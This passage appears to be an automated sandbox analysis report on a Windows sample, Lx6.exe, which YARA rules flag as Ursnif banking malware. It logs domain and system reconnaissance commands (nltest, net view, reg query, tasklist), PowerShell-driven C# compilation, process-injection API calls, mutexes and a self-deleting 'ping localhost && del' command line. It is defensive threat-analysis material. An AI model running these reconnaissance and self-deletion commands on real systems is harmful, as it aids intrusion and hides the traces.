Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"

Source: C:\Users\user\Desktop\Lx6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akfsyqoz.ont.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076FD17 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2692:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B0580A46-4F94-62F5-59E4-F3B69D58D74A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_01
Source: C:\Users\user\Desktop\Lx6.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D81B4F77-576D-CA2A-A18C-7B9E6580DFB2}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_01
Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D44985C1-232B-2616-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Mutant created: \Sessions\1\BaseNamedObjects\{78F747AD-7754-6AA7-C12C-9B3E8520FF52}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{443CA95C-D31A-1662-7DB8-B7AA016CDB7E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E47BD961-F315-B6E2-9D58-D74A210CFB1E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{48DADAAC-07B9-BA22-D1FC-2B8E95F08FA2}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3912:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6CC2E80A-DBDA-7E52-C560-3F92C994E3E6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01

Source: C:\Users\user\Desktop\Lx6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr\|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075B106 push ecx; mov dword ptr [esp], 00000002h
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00772AB3 push ecx; ret
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00772580 push ecx; ret
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00769772 push ss; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03042AB3 push ecx; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302B106 push ecx; mov dword ptr [esp], 00000002h
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03039772 push ss; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03042580 push ecx; ret

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\msihj3zd.dll	Jump to dropped file

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Self deletion via cmd or bat file

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe

Source: C:\Users\user\Desktop\Lx6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Lx6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
